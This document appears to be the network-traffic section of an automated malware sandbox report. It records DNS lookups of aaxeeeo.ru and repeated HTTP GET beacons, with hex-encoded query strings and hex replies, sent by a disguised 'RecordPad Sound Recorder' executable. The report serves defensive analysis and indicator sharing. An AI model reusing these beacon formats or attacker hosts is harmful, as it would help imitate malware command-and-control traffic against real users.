                                                                                    Jun 11, 2024 19:43:48.123001099 CEST805265394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:48.123083115 CEST5265480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:48.123111010 CEST5265380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:48.123286963 CEST5265480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:48.128058910 CEST805265494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:49.296906948 CEST805265494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:49.297000885 CEST5265480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:49.414774895 CEST5265480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:49.415086985 CEST5265580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:49.419858932 CEST805265594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:49.419892073 CEST805265494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:49.419954062 CEST5265580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:49.419982910 CEST5265480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:49.420214891 CEST5265580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:49.424922943 CEST805265594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:50.627034903 CEST805265594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:50.627160072 CEST5265580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:50.742924929 CEST5265580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:50.743264914 CEST5265680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:50.748019934 CEST805265694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:50.748054981 CEST805265594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:50.748102903 CEST5265680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:50.748120070 CEST5265580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:50.748248100 CEST5265680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:50.761691093 CEST805265694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:52.371663094 CEST805265694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:52.371730089 CEST5265680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:52.372464895 CEST805265694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:52.372508049 CEST5265680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:52.477034092 CEST5265680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:52.477514982 CEST5265780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:52.482584000 CEST805265794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:52.482675076 CEST5265780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:52.482820034 CEST805265694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:52.482821941 CEST5265780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:52.482867002 CEST5265680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:52.488879919 CEST805265794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:53.605895042 CEST805265794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:53.605983973 CEST5265780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:53.731621981 CEST5265780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:53.731939077 CEST5265880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:53.736901999 CEST805265894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:53.736974955 CEST805265794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:53.736983061 CEST5265880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:53.737056971 CEST5265780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:53.737195969 CEST5265880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:53.742044926 CEST805265894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:54.888930082 CEST805265894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:54.889013052 CEST5265880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:55.010010004 CEST5265880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:55.010191917 CEST5265980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:55.015285969 CEST805265994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:55.016422987 CEST805265894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:55.016513109 CEST5265880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:55.016661882 CEST5265980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:55.016661882 CEST5265980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:55.021524906 CEST805265994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:56.189399958 CEST805265994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:56.189698935 CEST5265980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:56.307054996 CEST5265980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:56.307945013 CEST5266080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:56.312304020 CEST805265994.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:56.312532902 CEST5265980192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:56.312721968 CEST805266094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:56.312819004 CEST5266080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:56.313009024 CEST5266080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:56.317755938 CEST805266094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:57.440124035 CEST805266094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:57.441864967 CEST5266080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:57.588694096 CEST5266180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:57.588694096 CEST5266080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:57.593575001 CEST805266194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:57.593770981 CEST5266180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:57.593794107 CEST5266180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:57.596528053 CEST805266094.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:57.596849918 CEST5266080192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:57.598824024 CEST805266194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:58.732775927 CEST805266194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:58.732857943 CEST5266180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:58.867955923 CEST5266180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:58.868520975 CEST5266280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:58.873164892 CEST805266194.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:58.873226881 CEST5266180192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:58.873325109 CEST805266294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:58.873390913 CEST5266280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:58.873533964 CEST5266280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:58.878283978 CEST805266294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:44:00.119187117 CEST805266294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:44:00.119291067 CEST5266280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:44:00.274878025 CEST5266280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:44:00.275182009 CEST5266380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:44:00.279987097 CEST805266394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:44:00.280107975 CEST5266380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:44:00.280155897 CEST805266294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:44:00.280229092 CEST5266280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:44:00.280297995 CEST5266380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:44:00.285007000 CEST805266394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:44:01.524300098 CEST805266394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:44:01.525908947 CEST5266380192.168.2.594.156.8.14

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jun 11, 2024 19:42:17.263564110 CEST53510291.1.1.1192.168.2.5
                                                                                    Jun 11, 2024 19:42:49.843638897 CEST6473553192.168.2.5152.89.198.214
                                                                                    Jun 11, 2024 19:42:50.595675945 CEST5364735152.89.198.214192.168.2.5

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jun 11, 2024 19:42:49.843638897 CEST192.168.2.5152.89.198.2140x46a7Standard query (0)aaxeeeo.ruA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jun 11, 2024 19:42:50.595675945 CEST152.89.198.214192.168.2.50x46a7No error (0)aaxeeeo.ru94.156.8.14A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • aaxeeeo.ru

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.55261894.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:42:50.648471117 CEST317OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ff710c2e8929d3d HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:42:52.047190905 CEST1044INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:42:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 33 34 34 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 35 38 31 64 65 34 36 66 62 38 37 64 32 65 38 31 65 30 31 65 39 61 32 35 64 66 63 35 32 39 31 62 64 64 33 38 32 64 37 63 30 31 34 63 34 31 34 64 65 65 35 63 38 36 35 37 32 65 33 31 34 39 31 38 64 38 34 31 34 32 31 65 30 37 32 34 36 61 66 36 62 66 30 36 30 62 37 33 31 35 36 63 36 66 34 64 30 30 38 63 30 34 38 63 63 37 39 62 31 30 65 66 65 33 30 38 63 33 38 65 63 31 39 62 38 36 37 63 36 35 35 62 31 65 30 34 65 65 64 35 31 37 65 34 62 65 39 33 61 36 35 39 30 33 38 37 39 38 64 66 64 30 66 63 31 65 62 39 33 39 30 33 61 63 64 36 66 39 64 31 66 64 64 34 65 38 64 32 62 62 30 34 37 62 32 65 39 34 31 32 30 65 61 37 62 64 38 66 38 37 39 62 39 38 34 65 65 64 64 34 66 66 38 33 38 63 39 30 38 33 34 35 65 35 39 33 65 65 32 32 63 37 32 30 32 36 37 62 63 65 63 38 64 66 35 38 37 32 35 35 34 66 38 35 64 37 62 32 37 65 30 32 33 35 66 65 39 66 65 65 35 38 39 66 30 33 66 37 62 61 34 65 64 34 63 39 61 38 63 65 35 37 32 32 37 30 [TRUNCATED]
                                                                                    Data Ascii: 34467b68a8a3203a77b0418f55f677581de46fb87d2e81e01e9a25dfc5291bdd382d7c014c414dee5c86572e314918d841421e07246af6bf060b73156c6f4d008c048cc79b10efe308c38ec19b867c655b1e04eed517e4be93a659038798dfd0fc1eb93903acd6f9d1fdd4e8d2bb047b2e94120ea7bd8f879b984eedd4ff838c908345e593ee22c720267bcec8df5872554f85d7b27e0235fe9fee589f03f7ba4ed4c9a8ce572270dbc6ce886cab460db6905283164a75fccc3ac3829a4cb0bbd1eb8aa38b9c5cb307f2b09d52eea13f0d0bf0651d33d1ace54dbf3639625bf8856a2fcd1acc5252aba72beed0a9babbd745cbe86f43facff84981eef1de85f804c67cebdc4e3de4979a091e724ae72810535ab22d433de9e1ec95cb12f051956d4d66f5531506585fc8522247e4710d1c3b4100dfadcbae9dd347f70e63780dc070a4983a8c6035245d27e7f58334ee3d1d9c4f8d45b9c226d4bfe6235822abccd937f8a54cb8d201515609ff780eb1009b8298ed2107303dd37daa5d44c2e5a2dc2625bb351502f22c214b5f8f2a477aec7904c0dde76c5405386b6d160d95832b2580
                                                                                    Jun 11, 2024 19:42:54.899607897 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:42:55.545264006 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:42:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.55262194.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:42:55.670104027 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:42:57.040334940 CEST902INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:42:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 32 62 36 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 66 38 37 63 39 66 35 31 64 30 31 65 64 61 34 34 61 65 38 30 30 64 32 66 33 38 38 65 64 39 34 38 63 34 63 38 34 34 64 63 64 65 34 64 64 33 32 32 39 61 66 34 35 65 30 64 35 63 37 31 66 32 61 65 61 37 37 35 38 61 36 37 34 66 65 36 32 62 37 33 31 35 30 63 33 65 30 64 30 30 61 64 65 34 32 63 39 37 62 62 61 31 31 66 66 33 33 38 31 32 66 65 31 30 65 61 34 36 37 63 33 34 64 62 61 65 33 35 30 65 63 35 64 37 66 34 39 65 39 32 34 36 37 39 65 33 61 36 66 38 62 65 31 31 37 63 30 66 31 39 34 39 39 33 38 64 33 36 65 39 66 31 36 64 32 35 31 38 61 32 61 62 36 35 32 62 32 65 31 35 61 33 66 65 63 37 62 64 34 65 33 37 30 62 62 39 31 65 64 64 37 34 66 65 63 33 66 63 39 31 36 33 35 35 36 35 32 32 38 66 64 32 64 37 32 31 36 36 37 62 64 65 62 39 33 66 66 38 30 32 38 35 62 65 34 35 63 37 62 32 31 66 65 32 31 35 35 66 35 65 32 65 36 38 64 66 64 32 30 37 39 61 31 65 38 35 39 39 33 38 63 66 31 37 62 32 37 31 [TRUNCATED]
                                                                                    Data Ascii: 2b667b69c953804b26b565fe95b321bd19a55ff87c9f51d01eda44ae800d2f388ed948c4c844dcde4dd3229af45e0d5c71f2aea7758a674fe62b73150c3e0d00ade42c97bba11ff33812fe10ea467c34dbae350ec5d7f49e924679e3a6f8be117c0f1949938d36e9f16d2518a2ab652b2e15a3fec7bd4e370bb91edd74fec3fc91635565228fd2d721667bdeb93ff80285be45c7b21fe2155f5e2e68dfd2079a1e859938cf17b2713bd63ee9fcdac64d1750429307aad55c7d7ac392ebac206b01eb1a22cb9c1ce2e7d2e04d030eb13e5d0b90151d33f0dc554daed629f24bd935ea2e9d1a0c52525bd66bce50385a1ba7b50a287f421a6fd84981dec10fc5b854b72ceb4c8f7da4a67a192e632b17c891136ae22ca3fd79d00cb5db53a051454d4d56f5525506785e28f2c2f6a4d10cfc2b11b1bf5c8b0e9c3357a7bf93e85c00f09409daac4084d44dd6374583350e2d9d4d2f6ce599e3c6c4efe4c0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.55262394.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:42:57.171207905 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:42:58.559915066 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:42:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.55262494.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:42:58.732763052 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:00.105539083 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:42:59 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.55262594.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:00.233903885 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:01.623615980 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:01 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.55262694.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:01.749475956 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:03.654938936 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:03 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.55262794.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:03.785664082 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:04.979623079 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:04 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:05.086605072 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:05.556149006 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:05 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20
                                                                                    Jun 11, 2024 19:43:05.666289091 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:06.142509937 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:05 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.55262894.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:06.376940966 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:07.457345963 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:07 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.55262994.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jun 11, 2024 19:43:07.601991892 CEST325OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                    Jun 11, 2024 19:43:08.691147089 CEST220INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:43:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: e67b680813008c20


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.55263094.156.8.14801412C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    TimestampBytes transferredDirectionData
